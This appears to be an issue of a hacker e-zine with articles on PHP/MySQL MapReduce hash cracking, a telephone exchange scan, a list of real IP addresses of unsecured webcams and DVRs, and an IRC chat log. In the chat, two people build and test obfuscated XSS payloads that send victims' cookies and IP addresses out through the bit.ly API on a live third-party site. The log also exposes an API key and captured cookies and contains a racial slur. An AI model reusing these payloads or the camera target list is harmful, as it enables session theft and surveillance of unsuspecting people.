- 20 static void tcp_diag_get_info(struct sock *sk, struct inet_diag_msg *r,
- 21 void *_info)
- 22 {
- 23 const struct tcp_sock *tp = tcp_sk(sk);
- For more information on Linux kernel development, check out:
- - The Linux Kernel Newbies site http://kernelnewbies.org/
- - The linux-kernel mailing list FAQ http://www.tux.org/lkml/
- - The Linux Kernel Hackers' Guide from the Linux Documentation Project
- http://tldp.org/LDP/khg/HyperNews/get/khg.html (highly recommended)
- - And, of course, the main Linux Kernel Archives site http://kernel.org
- [==================================================================================================]
- -=[ 0x08 High Performance Hash Cracking with MapReduce, Part 2
- -=[ Author: elchupathingy
- -=[ IRC: irc.gonullyourself.org #gny
- /----------------------------------------------------------------------------------------
- |
- | Introduction
- |
- The last article talked about the basic theory of MapReduce and a few examples of how it can be
- used. The options for MapReduce are not limited to those mentioned, but they are the easiest ones
- to understand the concept of breaking up larger tasks and passing this information on to other
- nodes. For this article, we will focus more on the code aspect of MapReduce instead of the higher-
- level concepts.
- /----------------------------------------------------------------------------------------
- |
- | Background
- |
- The very basic implementation of MapReduce shown here is something that can be expanded upon
- easily. It provides the method of automatic data pre-processing and automatic post-processing.
- But, being a simple implementation, there are problems with some of the mechanics inside the code.
- Though, that is left to someone else to fix. By familiarizing yourself with the algorithm, and
- stepping through the code, it should be a trivial manner to have yourself a fully functioning
- MapReduce implementation.
- /----------------------------------------------------------------------------------------
- |
- | Theory
- |
- To recap: The idea behind MapReduce is quite simple to grasp, but its layout is detailed and may
- lead to confusion at times. Here is a look at a typical layout of a MapReduce network:
- /----------------------------------------------\
- /------\ | | | | | |
- |Master|----/ /------\ /------\ /------\ /------\ /------\
- \------/ |Mapper| |Mapper| |Mapper| |Mapper| |Mapper|
- \------/ \------/ \------/ \------/ \------/
- | | | | |
- | | | | |
- /-------\ /-------\ /-------\ /-------\ /-------\
- |Reducer| |Reducer| |Reducer| |Reducer| |Reducer|
- \-------/ \-------/ \-------/ \-------/ \-------/
- | | | | |
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \ | / /
- \ \|/ /
- \ | /
- \-----------------/
- |
- /---------\
- |Answer!!!|
- \---------/
- Now that's a picture. This network layout has two key characteristics to it:
- 1) Series of Mappers
- 2) Series of Reducers
- These two things are the meat of the MapReduce concept. Now, what exactly is MapReduce? It's
- formally defined as the following:
- /------------------------------------------------------------------------------------
- |MapReduce is a framework for processing huge datasets on certain kinds of
- |distributable problems using a large number of computers (nodes), collectively
- |referred to as a cluster. Computational processing can occur on data stored either
- |in a filesystem (unstructured) or within a database (structured).
- | - Wikipedia
- Now that that's out of the way, lets move onto real code and see how this works in the given
- implementation.
- Firstly, what software is providing the backend infrastructure?
- The implementation relies on the following:
- Web server: Apache or whatever you have as long as it supports PHP.
- MySQL
- That's it. The clients run from php-cli but can also be called by the web server if desired.
- The MySQL tables that the scripts interact with are very simple:
- /------------------------------------------------------------------------------------
- | CREATE TABLE IF NOT EXISTS `node` (
- | `id` varchar(32) NOT NULL,
- | `type` int(11) NOT NULL,
- | `job_id` varchar(32) NOT NULL,
- | `last_connect` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
- | UNIQUE KEY `id` (`id`)
- | ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
- |
- | CREATE TABLE IF NOT EXISTS `job` (
- | `id` varchar(32) NOT NULL,
- | `status` int(11) NOT NULL,
- | `time_added` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
- | `mappers` int(11) NOT NULL,
- | `reducers` int(11) NOT NULL,
- | `time_started` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
- | PRIMARY KEY (`id`)
- | ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
- |
- These tables provide the necessary framework for this given implementation, while demonstrating
- simple MapReduce structure in an obvious yet functional manner. Should MapReduce be used in a
- production environment, a more efficient, scientifically-designed framework should be used. High
- performance applications should most likely not be using an interpreted language, additionally.
- Obviously, these tables are of no use without the scripts that interact with the database. The
- main script that facilitates this interaction is 'stat.php'. It provides a vector for the nodes to
- talk with the master, in most cases, it keeps track of the nodes' last connect time and assigns the
- job of either 'mapper' or 'reducer' to each. The code is straightforward, and the source code
- should be relatively self-explanatory by scanning over it. So, the next step is to determine the
- method of relaying data between master and node. The data is structured in EL markup files, which
- look suspiciously similar to existing markup languages like HTML and XML:
- /------------------------------------------------------------------------------------
- | <EL>
- | <id>ec366edc8a513f467af89f2e5cd9f37a</id>
- | <type>SET</type>
- | <payload name="job_id">
- | 85103e20ac8441af181b15f58fc53b08
- | </payload>
- | </EL>
- |
- The "id" tag contains the ID of the node. The "type" tag tells the node to perform a specific
- action, in this case, to set its "job_id" to the payload. The "payload" tag holds the data that
- will be assigned to a variable stored on the node. It is named such that the variable is assigned
- correctly. In this particular packet, the information between the opening and closing "payload"
- tags is an MD5 hash, though it does not always have to be. However, protocol defines that the
- payload must only be alphanumeric (only contains numbers or letters). If the "type" tag is set to
- "FILE", then the payload should be treated as Base64-encoded data. This protocol is simple but
- allows for easy parsing and greater flexibility.
- Here is an example handshake performed between node and master. This handshake is initiated by
- a node upon startup to seek new jobs:
- /---------------------------------------------------------------------------------------------\
- |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=starting|
- \---------------------------------------------------------------------------------------------/
- |
- |
- /-------------------------------------------------\
- | <EL> |
- | <id>ec366edc8a513f467af89f2e5cd9f37a</id> |
- | <type>REQUEST</type> |-----------------------\
- | </EL> | |
- \-------------------------------------------------/ |
- |
- |
- /--------------------------------------------------------------------------------------------\
- |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=whatami|
- \--------------------------------------------------------------------------------------------/
- |
- |
- /-------------------------------------------------\
- | <EL> |
- | <id>ec366edc8a513f467af89f2e5cd9f37a</id> |
- | <type>SET</type> |
- | <payload name="type"> |
- | reducer |-----------------------\
- | </payload> | |
- | </EL> | |
- \-------------------------------------------------/ |
- |
- |
- /--------------------------------------------------------------------------------------------\
- |http://127.0.0.1/map_reduce_zine/stat.php?id=ec366edc8a513f467af89f2e5cd9f37a&status=looking|
- \--------------------------------------------------------------------------------------------/
- |
- |
- /-------------------------------------------------\
- | <EL> |
- | <id>ec366edc8a513f467af89f2e5cd9f37a</id> |
- | <type>SET</type> |
- | <payload name="job_id"> |
- | 85103e20ac8441af181b15f58fc53b08 |
- | </payload> |
- | </EL> |
- \-------------------------------------------------/
- Once the node has received a job, it will send another request to the master for the script and
- data files. The job files, which contain the split up work, are then stored in a folder specific to
- that job_id. To retrieve jobs files from the folder, the follow script is used:
- /------------------------------------------------------------------------------------
- |#job_chunks.php
- |$dir = opendir( "./chunks/$job_id" );
- |
- |if( $dir )
- |{
- | do
- | {
- | $thing = readdir( $dir );
- |
- | if( $thing == FALSE )
- | {
- | rmdir( "./chunks/$jobs_id" );
- | die;
- | }
- |
- | if( $thing == "." || $thing == ".." )
- | continue;
- | else
- | break;
- |
- | }while( true );
- |
- | if( $thing && $thing != "." && $thing != ".." )
- | {
- | $output = "<EL>\r\n";
- | $output .= "\t<id>$id</id>\r\n";
- | $output .= "\t<type>FILE</type>\r\n";
- | $output .= "\t<payload name=\"chunk\">\r\n";
- | $output .= "\t\t".base64_encode( file_get_contents( "./chunks/$job_id/$thing" ) )."\r\n";
- | $output .= "\t</payload>\r\n";
- | $output .= "</EL>";
- | unlink( "./chunks/$job_id/$thing" );
- | closedir( $dir );
- | echo $output;
- | }
- |}
- |
- This code grabs the next chunk from the directory and wraps it as a EL packet, where the output
- is then sent to the node.
- From here, mapper nodes will process this chunk of data and start a small, one-time use web
- server. The reducer nodes request the IP:PORT of a mapper node, grabbing the result. After doing
- so, they further process the data and upload their results to the master.
- The master does a final reduction step on the reduced results and produces a final, usable
- result that is downloaded by the administrator.
- Although very much functional, the implementation that is given with this article possesses a
- few inherent issues:
- 1) If a node does not complete a job, then that node's results are lost.
- 2) There is no redundancy of nodes.
- 3) The code as a whole was not written with security in mind. Testing should only be
- performed on a private network.
- 4) It uses HTTP to transfer messages, which makes the code easy to write in exchange for
- introducing an enormous amount of overhead.
- 5) Speed gains from distributing the cracking process among multiple nodes is negated by the
- fact that nodes request chunks more quickly than other nodes are able to download them,
- resulting in multiple nodes receiving the same chunk. Requesting a chunk is not a
- "blocking" operation. This resulted in a dirty code hack using random sleep times.
- With that being said, this project still serves as a good learning tool to those interested in
- the MapReduce algorithm.
- Download the source package for this article:
- http://www.gonullyourself.org/zine/4/MapReduce.tar.gz
- MD5sum: d985ffa4b2fcd63d2a6275697acf252e
- SHA1sum: fb798594216e87b51fd194db1a31e580ebe47a7d
- A few things need to be done first before testing this code. First, the config.ini files should
- be updated to point to the URL of your web server and the folder the MapReduce code is installed in.
- The default is "http://127.0.0.1/map_reduce_zine". Once the configs have been updated correctly,
- the nodes are ready to run; however, the master must be set up first. Import and create the tables
- in map_reduce.sql. To make sure the master runs without problems, just be lazy and chmod 777 all
- the directories. For what we're doing, it really doesn't matter. Now, all the configurations are
- complete. To test the MapReduce cluster, initialize two or more nodes locally by running the
- "client.php" file in each of the "testing" folders. Once they are running, they will begin to poll
- the master for work.
- To add a job to the cluster, navigate to "add_job.php" in your browser. From here, add the
- corresponding files from the "example" directory. Once a job is added, the nodes will automatically
- grab the work script and any data needed to perform the job. Once the nodes are done with their
- work, they will begin to poll for new jobs. The example scripts and data are to find the plain text
- string "elchupathingy" from the hash in the "node_script.php". To see if it worked, browse to
- "show_results.php" and select the link there; it will run the "post-process" script and, in this
- case, display the plain text.
- lata, ELChupathingy
- [==================================================================================================]
- -=[ 0x09 Camera/DVR Scan
- -=[ Author: storm
- -=[ Email: storm@gonullyourself.org
- -=[ Website: http://gonullyourself.org/
- Oh, the joys of nmap.
- Open access (no login)
- ----------------------
- http://165.98.238.72/view/index.shtml
- http://165.98.238.75/view/index.shtml
- http://165.98.238.78/view/index.shtml
- http://186.1.14.117/view/index.shtml
- http://24.1.5.61:8082/Simple/index.htm
- http://24.1.10.154:81/
- http://24.1.12.248:1028/
- http://24.1.26.48/img/main.cgi?next_file=main.htm
- http://72.250.135.252:1024/img/image.cgi?next_file=main_fs.htm
- http://74.237.69.5/main.cgi?next_file=main.htm
- http://83.227.138.166/main.cgi?next_file=main.htm
- http://75.61.194.41:1024/main.cgi?next_file=index_in.htm
- http://193.87.102.25/img/main.cgi?next_file=main.htm
- http://213.198.245.70/img/main.cgi?next_file=main.htm
- http://74.237.69.5/main.cgi?next_file=main2.htm
- http://pineairewebcam.dyndns.org/
- http://217.159.181.99/
- http://193.138.213.166/
- http://72.2.138.209:81/
- http://ajs01.dyndns.org/
- http://62.106.98.204/
- http://80.54.239.234/
- http://195.47.194.200/
- http://78.36.109.5/
- http://www.zodiac-bg.com/files/Jview.htm
- http://82.107.211.3/
- http://84.53.31.54/
- http://129.170.124.12/
- http://193.178.224.10/
- http://chrastal.homeip.net:5050/
- http://194.112.215.163/
- http://129.70.141.62/
- http://209.94.75.172/
- http://75.149.126.138:89/
- http://67.53.198.178/
- http://128.103.101.254/
- http://157.157.79.85/
- http://208.71.234.122/
- http://24.25.42.218:52210/
- http://65.182.241.193/
- http://216.117.210.183:86/
- http://203.213.212.174:1365/
- http://142.217.181.117:89/
- http://87.243.178.244/
- http://81.138.9.30:81/
- http://122.3.81.6:82/
- http://68.101.243.94:82/
- http://80.13.146.246/
- http://64.203.239.75/
- http://193.251.181.104/
- http://213.110.240.157/
- http://216.160.181.242:10083/
- http://67.242.57.128:86/
- http://www.rmackey.com/
- http://71.194.73.80:4343/
- http://209.117.235.143/
- http://71.157.136.110:81/
- http://216.129.211.131/
- http://217.133.212.61/
- http://143.107.3.149/
- http://210.230.126.237:82/
- http://62.147.232.188/
- http://216.137.100.129:81/
- http://210.230.133.76:82/
- http://222.3.77.52:81/
- http://222.11.124.75:81/
- http://116.64.17.198/
- http://210.249.10.81:81/
- http://220.217.129.21:81/
- http://210.249.21.157:82/
- http://222.1.186.218:81/
- http://221.119.133.176:81/
- http://213.160.168.72/
- http://61.204.127.233:82/
- http://222.3.114.56:81/
- http://71.110.145.16:89/
- http://89.234.195.78/
- http://99.135.117.196/
- http://65.99.253.134/
- http://222.11.60.180:81/
- http://61.117.29.119:81/
- http://82.176.123.82/
- http://66.203.223.50:82/
- http://24.20.88.10:84/
- http://24.19.205.82:8095/
- http://59.133.145.190:82/
- http://68.16.245.20/
- http://220.214.128.66:82/
- http://124.105.235.84/
- http://222.5.86.181:82/
- http://210.169.100.66:82/
- http://222.13.239.47:82/
- http://208.54.215.145/
- http://66.35.88.6/
- http://98.112.171.186:81/
- http://59.133.146.58:82/
- http://195.131.161.122:85/
- http://208.71.217.253:50001/
- http://220.217.122.193:81/
- http://222.15.48.210:82/
- http://220.217.130.205:81/
- http://98.190.143.254:23/
- http://200.124.240.142:8086/
- http://70.154.139.169:83/
- http://205.250.69.239:81/
- http://124.45.116.105:81/
- http://61.204.122.175:82/
- http://173.46.175.162:32000/
- Login required
- --------------
- https://24.206.4.253/index.htm
- http://24.231.40.38/
- http://24.231.41.232/
- http://24.231.50.181/
- http://24.231.54.90/
- http://24.244.132.179/
- http://24.244.134.63/
- http://24.244.135.87/
- http://24.244.135.250/
- http://216.137.0.39/auth.html
- http://216.137.11.89/
- http://24.244.145.66:8080/
- http://24.244.145.182/
- http://24.244.146.129/
- http://24.244.146.192/
- http://24.244.180.229/
- http://64.150.197.130/
- http://64.150.207.20/
- http://64.150.210.159/
- http://64.150.220.6/
- http://64.150.220.67/
- http://64.150.222.210/
- http://64.150.231.141/
- http://64.150.237.8/
- https://64.150.238.144/auth.html
- http://64.150.245.160/
- http://65.75.92.213/
- http://65.75.96.59/
- http://65.75.107.70/
- http://65.75.114.105/
- http://65.75.115.236/
- http://200.4.168.164/
- http://200.80.109.38/
- http://186.1.3.18/
- http://186.1.3.69/
- http://186.1.10.155/
- http://190.106.11.19/
- http://190.106.11.20/
- http://190.106.14.14/
- http://190.106.19.67/
- http://190.184.94.41/
- http://165.98.224.67/
- http://165.98.235.2/
- http://165.98.236.114/
- http://186.1.14.180/
- http://186.1.14.181/
- http://186.1.14.182/
- http://190.106.11.18/
- http://190.184.23.39/
- http://190.184.35.95/
- http://190.184.40.114/
- http://190.184.43.97/
- http://190.184.45.153/
- http://190.184.72.105/
- http://190.212.134.190/
- http://190.212.134.242/
- http://196.200.49.162/
- http://24.1.10.135:1050/
- http://24.1.13.39:8080/
- http://24.1.16.206/
- http://186.1.10.156/login.html?1600&1
- http://190.106.4.27/
- [==================================================================================================]
- -=[ 0x0a 303-833-00xx Scan
- -=[ Author: Shadytel, Inc
- -=[ Website: http://www.shadytel.com/
- 0001 - Expanded Announcement System (no supe)
- 0002 - Ringout
- 0003 - Ringout
- 0004 - Ringout
- 0005 - Reorder via SS7?
- 0006 - Burst of 2200 hz
- 0007 - Ringout
- 0008 - Busy signal via distant end
- 0009 - 102-type milliwatt, hangs up after ~3 cycles
- 0010 - Same as 0009
- 0012 - Busy via SS7
- 0013 - Coin deposit rec
- 0018 - LD service restricted rec
- 0020 - Reorder via SS7
- 0021 - Ringout
- 0022 - Ringout
- 0030 - Ringout
- 0031 - Ringout
- 0032 - Ringout
- 0034 - Ringout
- 0035 - Ringout
- 0036 - Ringout
- 0037 - Ringout
- 0038 - Modem - 7/E/1,
- *displays TID:, then garbage, then TID too long. Please try again.*
- 0039 - Something picks up silently after two rings. Faint clicking noise is sometimes audible.
- 0041 - Ringout
- 0057 - 105-type test
- 0058 - Something via SS7? Recheck
- 0065 - rec, "Remember, you must dial one plus your area code, or zero plus your area code and the
- number for long distance and operator assisted calls."
- 0066 - Dialing 1/0 not necessary rec
- 0067 - Dial 1 first rec
- 0068 - 100-type milliwatt
- 0069 - Dialing 0 not necessary rec
- 0070 - YCDNGT
- 0075 - YCDNGT
- 0076 - CBCAD/call your operator to help you
- 0077 - CBCAD/check your instruction manual
- 0078 - Permanent signal rec
- 0080 - Low tone
- 0081 - Same as 0078
- 0082 - Coin deposit rec
- 0083 - LD service restricted rec
- 0084 - CAC error rec
- 0085 - Tandem CBCAD recording?
- 0086 - Dialing CAC not necessary rec
- 0087 - Network difficulties rec
- 0089 - CAC error rec
- 0090 - ACB rec
- 0091 - Busy via SS7
- 0098 - Reorder via SS7?
- 0099 - DATU
- [==================================================================================================]
- -=[ 0x0b bit.ly Shenanigans (aka, XSS is hard bro)
- -=[ Author: Silks, elchupathingy
- -=[ IRC: irc.gonullyourself.org #gny
- Now, while we could neatly explain how we built up our implementation of this trick, it wouldn't
- really capture our thought process and just general fucking around. At some point, during the early
- hours of the morning, I pondered the idea of grabbing a fellow #gny chatter's IP for the lulz.
- Knowing that JavaScript has no reliable function for retrieving a client's IP, the best approach was
- to use a standard whatismyip.com site to grab the IP. With the IP address theoretically in my hands,
- I approached elchupathingy for ideas of how to export that information without any server-side ties.
- After some playing around, we came up with a solution that would gather and store a victim's IP
- address in a clever manner, and then redirect them to a final destination as expected. Here is our
- chat log (mildly edited to hide moments of stupidity) which explains how we built this up.
- -Silks
- Silks: do you know of a site that is like a persistent xss but not even xss?
- Silks: will just store info temporary
- Silks: like
- Silks: x.php?q=lolIstolethisguysip:1.1.1.1
- elchupathingy: could use bit.ly to store it
- Silks: how so
- elchupathingy: it stores links you shorten
- Silks: basically, did you see my XSS, JS+PHP implementation?
- elchupathingy: don't think so
- elchupathingy: hmm storing people's info using bit.ly is kind of sly now that i think about it
- elchupathingy: lol
- elchupathingy: http://bit.ly/gsfxLp
- elchupathingy: see what the link expands to
- Silks: how would you create that though from JS?
- elchupathingy: one sec
- elchupathingy: "http://api.bitly.com/v3/shorten?login=$bitlylogin&apiKey=$bitlyapi&format=json&longU
- rl=http://google.com/search?q=".shit_goes_here
- Silks: k
- elchupathingy: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5be2a28cc9f0b2
- 52495179&format=json&longUrl=http://google.com/search?q=luls
- elchupathingy: just a GET or inclusion should work
- Silks: I guess if you can see the details in your bit.ly account that will export the info
- elchupathingy: http://google.com/search?q=USER:elchupathingy:PASS:lolpasssowrd
- elchupathingy: thats what it would look like
- Silks: I know man
- Silks: but you are ignoring the actual problem
- Silks: the point is, getting the data from the victims client to you
- Silks: so if bit.ly account store recently created urls
- Silks: then you can access that bit.ly and extract the info
- elchupathingy: ya
- elchupathingy: woot got the cookie via xss and bit.ly
- elchupathingy: lol
- elchupathingy: in a ungodly long xss string
- Silks: rofl
- Silks: so like
- elchupathingy: <script>;var x=new XMLHttpRequest();x.open(String.fromCharCode(71,69,84),String.fromC
- harCode(104,116,116,112,58,47,7,97,112,105,46,98,105,116,108,121,46,99,111,109,47,118
- ,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,61,101,108,99,104,117,112,9
- 7,116,104,105,110,103,1,38,97,112,105,75,101,121,61,82,95,51,49,54,56,57,53,49,55,55,
- 99,53,98,101,50,97,50,57,99,99,57,102,48,98,50,53,50,52,57,53,49,55,57,38,2,111,114,1
- 09,97,116,61,106,115,111,110,38,108,111,110,103,85,114,108,61,104,116,116,112,58,47,4
- 7,103,111,111,103,108,101,26,99,11,10,47,115,101,97,114,99,104,63,113,61).concat(docu
- ment.cookie));x.onreadystatechange=function(){};x.send();</script>
- elchupathingy: lol
- elchupathingy: ungodly long
- Silks: win
- Silks: funny thing is
- Silks: you can then just bit.ly that long url
- elchupathingy: exactly lol
- elchupathingy: and bit.ly will keep track of the people that click on it lol
- elchupathingy: at the same time of sending you their cookie
- Silks: guessing the api can retrieve links too
- Silks: so you can probably write a quick app to grab it back
- elchupathingy: yep
- elchupathingy: well what ya mean?
- elchupathingy: short url to the info?
- Silks: well
- Silks: say you wanna xss like 100 people
- Silks: everytime someone gets owned they create a new bit.ly
- Silks: so you write an app that connects to bit.ly api and retrieves new bit.ly's
- Silks: and from that grabs the redirect url and parses the data
- elchupathingy: maybe
- elchupathingy: have to look over the api real quick
- Silks: but yeah you can break it down to two commands
- elchupathingy: can get the countries for each link, statistics on number of clicks and referrrers
- Silks: bit_xxs_ify <data you want>
- Silks: spits out a bit.ly link that links to the long url
- Silks: I guess somehow you'd need to inject what you want
- Silks: like "document.cookie"
- Silks: or just have a menu of all the options
- Silks: bit_xss_ify cookie
- Silks: bit_xss_ify ip
- Silks: etc
- Silks: then you'd need
- Silks: bitly_to_data
- elchupathingy: ok can get the top 100 urls
- elchupathingy: through their api
- Silks: which will grab all your bit.ly urls and push new ones into db
- elchupathingy: http://bit.ly/fUGVEO
- Silks: pro stream music
- elchupathingy: click that wanna see if it works
- Silks: put it in search box
- Silks: didn't exe
- Silks: https://api-ssl.bitly.com/v3/user/clicks?access_token=BITLY_ASSIGNED_ACCESS_TOKEN&days=7
- Silks: oh nvm
- elchupathingy: nah got it
- elchupathingy: __qca=A0-153091312312-1291239025123263; __utmz=201001501.1201336810.6.6|utmccn=(refer
- ral)|utmcmd=referral|utmcct=/english/4245268-hf-trance-tiesto-vs-mark-knight-feat-din
- o-beautiful-world-original-mix.html; TRUID=12957903034531; CKTIME=1301436534; __utma=
- 251001561.940844074.1295790257.1297648116.1301436811.6
- Silks: right realtime_links
- elchupathingy: lol
- Silks: what's that?
- elchupathingy: your click
- Silks: lolz
- Silks: weird how that was referrer
- Silks: was from a blank tab
- elchupathingy: ya
- elchupathingy: but ya works fine
- Silks: stop stealing mah cookies
- elchupathingy: nom nom cookies
- Silks: ahh it was just cookies
- Silks: weird, my cookies show all that info? :\
- elchupathingy: ya
- Silks: ahh google analytics bs
- elchupathingy: TRUID=13018098525591; CKTIME=1301809854; popunder=yes; popundr=yes; setover18=1
- Silks: tracking cookie
- elchupathingy: thats mine
- Silks: check my latest one
- Silks: sec
- elchupathingy: http://bit.ly/hbMGMA much better lol
- Silks: WHY?
- elchupathingy: cats are awesome
- elchupathingy: lol
- elchupathingy: u know
- elchupathingy: that hurts my feelings
- Silks: rofl
- Silks: was trying to tamper data it
- Silks: but realised that wasn't the actual cookie
- elchupathingy: oh haha
- Silks: so just spammed your link
- Silks: lolz
- elchupathingy: with hte same thing?
- Silks: pro music
- Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179
- &format=json&longUrl=http://google.com/search?q=ELCHUPATHINGY_IS_A_NIGGER
- elchupathingy: doesn't work with the same thing lol
- Silks: i can change the cookie in tamper data
- Silks: but
- Silks: the js is grabbing document.cookie
- Silks: and I can't change the url
- Silks: maybe in webgoat but cba loading that
- elchupathingy: ah
- elchupathingy: but that hurts
- elchupathingy: i mean all caps
- Silks: shutup
- Silks: you stole my cookies
- elchupathingy: you clicked the fucking link lol
- Silks: I trusted you ;(
- elchupathingy: haha
- Silks: bah this is so dumb
- elchupathingy: lol
- elchupathingy: hmm
- elchupathingy: but the bit.ly thing is nice because it guarantees unique cookies
- Silks: what do you mean?
- elchupathingy: it hashes the url
- elchupathingy: and my username
- elchupathingy: so if the same person comes to the site the cookie will probably be the same and not
- be sent again
- elchupathingy: see if anyone in #gny clicks my link lol
- Silks: nub
- Silks: shoulda got it to steal their ip
- elchupathingy: lol
- elchupathingy: well too late
- Silks: can do it later
- elchupathingy: ya
- elchupathingy: oh thats cool u can modify what the hashes bit.ly goes to
- elchupathingy: so u could edit the xss as its happening lol
- elchupathingy: nvm just title
- Silks: <!--#echo var="REMOTE_ADDR"-->
- Silks: weird
- Silks: fucking ssi shit
- elchupathingy: ya
- elchupathingy: well nvm not getting anything from the two clicks lol
- Silks: hmm
- elchupathingy: but there seems to be confusion over what it is
- Silks: that xss, can you get it to alert?
- elchupathingy: ya it's the same one i used to get your cookie
- elchupathingy: just have a feeling they are using noscript
- Silks: where is it executing?
- elchupathingy: in body
- Silks: the results span?
- elchupathingy: <div class="response_time">Results for <span>
- Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Edocument.write(document.
- cookie);%3C/script%3E
- Silks: ahh
- Silks: works
- Silks: alert doesn't
- elchupathingy: oh no strings
- elchupathingy: gets escaped
- elchupathingy: <script>alert(123)</script> works
- Silks: what I just pasted works
- elchupathingy: ya
- Silks: weird that document.alert doesn't work
- Silks: or
- Silks: yeah i'm just being dumb
- elchupathingy: lol
- Silks: hmm
- Silks: there is one whatismyip site that returns your ip as text with a specific url
- elchupathingy: ya i used that
- Silks: link
- elchupathingy: sec
- elchupathingy: http://www.whatismyip.com/automation/n09230945.asp
- Silks: hmm
- Silks: technically got it working
- Silks: but getting owned by access-control-allow-origin
- elchupathingy: getting the ip? or getting it to work as a xss?
- Silks: printing the ip
- Silks: once I got it, easymode
- Silks: that specific XSS site though doesn't allow for it
- elchupathingy: ah
- Silks: hmm
- Silks: but then, that is odd that yours works
- Silks: ahh, something to do with actually accessing the method
- Silks: as readystagechange or w/e
- elchupathingy: im sending the request which is cool
- Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH
- ttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,4
- 7,99,104,101,98,107,105,112,46,99,121,110,100,110,115,46,99,111,109,47));x.onreadystatechange
- =function(){%20alert(x.status);%20};x.send();%3C/script%3E
- Silks: SAFE
- Silks: honestly
- Silks: not a dirty liar like you
- elchupathingy: lol
- elchupathingy: 0,0,0,0
- Silks: ?
- elchupathingy: alert boxes
- Silks: yeah
- Silks: that's with x.status
- Silks: should be 200
- Silks: if you fire up JS console you will see the error
- elchupathingy: not getting an error
- Silks: browser?
- elchupathingy: ff4
- Silks: oh it's fucking chrome
- elchupathingy: im mean i get a error on the page but its there no matter what
- elchupathingy: $(document).pngFix
- elchupathingy: is not a function
- Silks: although it's still not quite right
- Silks: still should return 200
- elchupathingy: ya
- Silks: well it is grabbing 200
- Silks: something up with code
- Silks: meh down to this origin bs
- Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH
- ttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fromCharCode%28104,116,116
- ,112,58,47,47,99,104,101,99,106,105,112,46,100,121,110,100,110,115,46,99,111,109,47%29,true%2
- 9;x.onreadystatechange=function%28%29{if%28x.readyState%20==%204%29%20{%20if%28x.status%20==%
- 20200%29%20{%20alert%28x.responseText%29;%20}}};x.send%28null%29;%3C/script%3E
- Silks: code effectively works
- Silks: well maybe, on another host
- Silks: but if you can host a file elsewhere then you can either chain JS where it does work or use
- PHP etc
- elchupathingy: ya
- elchupathingy: think i got it
- elchupathingy: one sec
- elchupathingy: Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x%
- 20=%20new%20XMLHttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fr
- omCharCode%28104,116,116,112,58,47,47,96,111,105,46,104,111,115,116,105,112,46,105,11
- 0,102,111%29,true%29;x.onreadystatechange%20=function%28%29{if%28x.readyState==4%29{a
- lert%28x.responseText.match%28new%20RegExp%28String.fromCharCode%2892,100,120,49,44,5
- 1,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49
- ,44,51,125%29%29%29%29;}};x.send%28%29;%3C/script%3E
- elchupathingy: http://bit.ly/f1Ygcc :D
- Silks: nice work elchupathingy
- Barney-: =]
- Barney-: what happened
- Silks: umm, we were messing around with XSS
- Barney-: rgr
- Silks: now have XSS code that can steal your IP
- Silks: well, it grabs the IP, gonna add it to what elchu was working on earlier, storing it in
- bit.ly links
- Barney-: hmm
- Silks: yeah Barney-, check this
- Barney-: ??
- Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x%20=%20new%20XML
- HttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,
- 47,97,112,105,46,104,111,115,116,105,112,46,105,110,102,111),true);x.onreadystatechange%20=%2
- 0function(){if(x.readyState==4){alert(x.responseText);}};x.send();%3C/script%3E
- Silks: this will print the response page of a whatismyip site
- Barney-: very cool
- Silks: I was trying with a different site and it was failing
- Barney-: thats real cool actually
- Silks: elchu tried with that one
- Silks: and then used regex
- Silks: so
- Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=<script>;var%20x%20=%20new%20XMLHttp
- Request();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,47,9
- 7,112,105,46,104,111,115,116,105,112,46,105,110,102,111),true);x.onreadystatechange%20=functi
- on(){if(x.readyState==4){alert(x.responseText.match(new%20RegExp(String.fromCharCode(92,100,1
- 23,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,
- 49,44,51,125))));}};x.send();</script>
- Silks: also we were discussing how to export info and talked about creating bit.ly links with APIs
- Silks: found out that it is possible to retrieve newly created links in the API too
- Silks: so..
- Barney-: but
- Barney-: how do you figure out
- Barney-: the bit.ly link
- Barney-: after its been created
- Silks: because of a bit.ly account
- Silks: so
- Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179
- &format=json&longUrl=http://google.com/search?q=
- Silks: will create the url
- Barney-: ah ok ok
- Barney-: so you login to the account
- Silks: and you can export the data but adding it to q=
- Barney-: but we don't want IPs we want coookies
- Silks: idd
- Silks: so
- Silks: if you look at the url above
- Silks: you just do
- Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895277c5ce2a29cc9f0b252495179
